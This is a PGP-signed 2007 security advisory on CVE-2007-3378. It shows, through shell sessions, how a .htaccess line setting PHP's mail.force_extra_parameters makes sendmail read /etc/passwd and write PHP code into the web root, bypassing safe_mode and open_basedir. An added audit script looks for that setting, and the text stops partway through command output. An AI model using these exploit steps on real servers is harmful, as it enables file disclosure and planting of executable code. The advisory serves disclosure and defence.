-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.4 mail.force_extra_parameters insecure]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- Written: 06.09.2007
- Public: 0x.0x.2007

SecurityReason Research
SecurityAlert Id: 47

CVE: CVE-2007-3378
SecurityRisk: Medium

Affected Software: PHP <= 5.2.4
Advisory URL:
http://securityreason.com/achievement_securityalert/47
Vendor: http://www.php.net
--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.
When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need "AllowOverride Options" or "AllowOverride All" privileges to do so.

php_value name value

Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value.
Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead.

php_flag name on|off

Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives.

mail.force_extra_parameters - Forces the specified parameters to be passed as extra command-line arguments to the sendmail binary. These parameters always replace the value of the 5th parameter to mail(), even in safe mode. Because the directive can be set with php_value, anyone who can write a .htaccess file in a directory where AllowOverride permits it chooses the arguments, and the sendmail binary then runs outside of every restriction that safe_mode and open_basedir place on PHP's own file access.

http://pl.php.net/manual/en/configuration.changes.php
=0D
--- 1. .htaccess safe_mode and open_basedir Bypass Vulnerability via mail.force_extra_parameters ---

We have received a lot of questions about the news item http://securityreason.com/news/0/0x1f, so here we show how to exploit this issue. When using PHP as an Apache module, you can also change the configuration settings using directives in a .htaccess file. That makes it possible to bypass safe_mode and open_basedir via mail.force_extra_parameters: mail() hands these parameters straight to the mail transfer agent, and it is the agent, not PHP, that then opens and writes files. On a lot of servers that agent is sendmail; it can also be exim, etc. Here we show how to exploit this for the most common one (sendmail).

For example, you can set mail.force_extra_parameters via .htaccess.
cxib# curl -I http://localhost:82
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2007 22:18:35 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.4
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT
ETag: "27e4f0-2c-4c23b600"
Accept-Ranges: bytes
Content-Length: 44
Content-Type: text/html

Apache 2.2.4 with PHP 5.2.4. Let's look at the folder /narkotyk on localhost:82.
=0D
cxib# ls -la
total 10
drwxrwxrwx 2 www www 512 Sep 7 00:26 .
drwxr-xr-x 4 www wheel 512 Sep 7 00:22 ..
-rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess
-rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php
-rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php
cxib# cat file1.php
<? include("/etc/passwd"); ?>

cxib# curl http://localhost:82/narkotyk/file1.php

Warning: include() [function.include]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/passwd owned by uid 0 in /usr/local/www/apache22/data/narkotyk/file1.php on line 1

Warning: include(/etc/passwd) [function.include]: failed to open stream: Invalid argument in /usr/local/www/apache22/data/narkotyk/file1.php on line 1

Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in /usr/local/www/apache22/data/narkotyk/file1.php on line 1

So safe_mode is on: PHP itself refuses to read a file owned by another uid.
Let's look at the files .htaccess and file2.php.
=0D
cxib# cat file2.php
<? var_dump(mail("root@localhost", "hallo", "root")); ?>
cxib# cat .htaccess
php_value mail.force_extra_parameters '-C /etc/passwd -X /usr/local/www/apache22/data/narkotyk/result.txt'

-C tells sendmail to use the given file as its configuration file, and -X makes it write a full trace log to the given path. Now let's send a request to file2.php:

cxib# curl http://localhost:82/narkotyk/file2.php
bool(false)

mail() returned false, because /etc/passwd is not a valid sendmail.cf and the message was never sent. But sendmail was started and wrote its trace log before giving up:

cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt
-rw-r--r-- 1 www www 7130 Sep 7 00:31 /usr/local/www/apache22/data/narkotyk/result.txt
cxib#

result.txt has been created, owned by the web server user and inside the document root. (sendmail gives up its set-user-ID privileges when -C is given, so it runs as www; this is why the log is owned by www, and also why only files that uid can read, such as the world-readable /etc/passwd, can be obtained this way.)

cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt
69647 >>> /etc/passwd: line 3: unknown configuration line "root:*:0:0:Charlie &:/root:/bin/csh"
69647 >>> /etc/passwd: line 4: unknown configuration line "toor:*:0:0:Bourne-again Superuser:/root:"
..... etc.

Every line sendmail cannot parse as configuration is echoed into the log, so we can read the file. safe_mode and open_basedir are bypassed, because it was sendmail, not PHP, that opened /etc/passwd.
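The description of php_value/php_flag above and the .htaccess trick just shown both come down to one question for an administrator: can a per-directory .htaccess set mail.force_extra_parameters on this server? The following audit script is an added example written for this page, not part of the advisory or of PHP. It walks a document root for .htaccess files that set the directive, and checks whether an httpd.conf still grants AllowOverride All/Options or pins the directive with php_admin_value, which the PHP manual states cannot be overridden from .htaccess. The .htaccess files and httpd.conf fragments it inspects are constructed in a temporary directory; the narkotyk path and the directive value are copied from the advisory purely as sample input.

```shell
#!/bin/sh
# Added example, not from the advisory: audit a document root for .htaccess
# files that set mail.force_extra_parameters, and check whether an httpd.conf
# pins the directive with php_admin_value (per the PHP manual, .htaccess and
# ini_set() cannot override php_admin_value) or still allows overrides.
# All paths and sample files below are constructed for this demo.

# Print every php_value/php_flag line in any .htaccess under $1 that sets
# mail.force_extra_parameters. Returns 1 if any was found, 0 if clean.
audit_htaccess() {
    # /dev/null as an extra operand makes grep prefix the file name even when
    # it gets a single file; -i because Apache directive names are
    # case-insensitive; "|| true" because grep exits 1 on no match.
    hits=$(find "$1" -type f -name .htaccess -exec \
        grep -inE '^[[:space:]]*php_(value|flag)[[:space:]]+mail\.force_extra_parameters' /dev/null {} +) || true
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Return 0 if httpd.conf $1 contains a php_admin_value for
# mail.force_extra_parameters (a .htaccess cannot change it after that),
# 1 otherwise.
conf_pins_extra_params() {
    grep -iqE '^[[:space:]]*php_admin_value[[:space:]]+mail\.force_extra_parameters' "$1"
}

# Return 0 if httpd.conf $1 still lets .htaccess change PHP settings, i.e. some
# AllowOverride line grants All or Options; 1 if no such grant exists.
conf_allows_override() {
    grep -iqE '^[[:space:]]*AllowOverride[[:space:]]+.*(All|Options)' "$1"
}

# --- constructed sample input -------------------------------------------
DEMO_ROOT=$(mktemp -d)
trap 'rm -rf "$DEMO_ROOT"' EXIT
mkdir -p "$DEMO_ROOT/clean" "$DEMO_ROOT/narkotyk"
# a harmless per-directory tweak
printf 'php_flag display_errors off\n' > "$DEMO_ROOT/clean/.htaccess"
# the .htaccess from the advisory, reproduced here as sample input
cat > "$DEMO_ROOT/narkotyk/.htaccess" <<'EOF'
php_value mail.force_extra_parameters '-C /etc/passwd -X /usr/local/www/apache22/data/narkotyk/result.txt'
EOF

WEAK_CONF=$DEMO_ROOT/httpd-weak.conf
HARD_CONF=$DEMO_ROOT/httpd-hardened.conf
# weak: every .htaccess may set PHP_INI_PERDIR directives
cat > "$WEAK_CONF" <<'EOF'
<Directory "/usr/local/www/apache22/data">
    AllowOverride All
</Directory>
EOF
# hardened: no overrides, and the directive is pinned (value "none" clears it)
cat > "$HARD_CONF" <<'EOF'
<Directory "/usr/local/www/apache22/data">
    AllowOverride None
    php_admin_value mail.force_extra_parameters none
</Directory>
EOF

# --- run the audit --------------------------------------------------------
echo "== .htaccess audit of $DEMO_ROOT =="
audit_htaccess "$DEMO_ROOT" || echo "FINDING: mail.force_extra_parameters is set from .htaccess"
for c in "$WEAK_CONF" "$HARD_CONF"; do
    if conf_allows_override "$c" && ! conf_pins_extra_params "$c"; then
        echo "$c: .htaccess may set mail.force_extra_parameters"
    else
        echo "$c: directive locked"
    fi
done
```

Run it as any user that can read the document root; on a real server replace DEMO_ROOT with the DocumentRoot and point the two conf checks at the real httpd.conf (and any included vhost files). The php_admin_value line is the durable fix on the Apache side regardless of the PHP version, because it is honoured even where AllowOverride must stay enabled for other directives.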
=0D
It is also possible to create a file containing PHP code this way. But for that sendmail must get far enough to write the message itself into the trace log, so we need a working sendmail.cf.

Example:

cxib# cat .htaccess
php_value mail.force_extra_parameters '-C /usr/local/www/apache22/data/narkotyk/sendmail.cf -X /usr/local/www/apache22/data/narkotyk/phpcode.php'
cxib# cat file3.php
<? var_dump(mail("root@xxxxxxxxxxxxxxxxxx", "h<? phpinfo(); ?>allo", "root")); ?>

We need to create /usr/local/www/apache22/data/narkotyk/sendmail.cf and configure it; it only has to be readable by the web server user, since sendmail runs as that user when -C is given. Then:

cxib# curl http://localhost:82/narkotyk/file3.php
bool(true)
cxib#
cxib# cat phpcode.php
69755 <<< To: root@xxxxxxxxxxxxxxxxxx
69755 <<< Subject: h<? phpinfo(); ?>allo
69755 <<<
69755 <<< root
69755 <<< [EOF]
69757 === CONNECT securityreason.pl
... etc

The subject line, PHP tag included, is written verbatim into phpcode.php. That file sits in the document root with a .php extension, so the web server executes it:

cxib# curl http://localhost:82/narkotyk/phpcode.php
69755 <<< To: root@xxxxxxxxxxxxxxxxxx
69755 <<< Subject: h
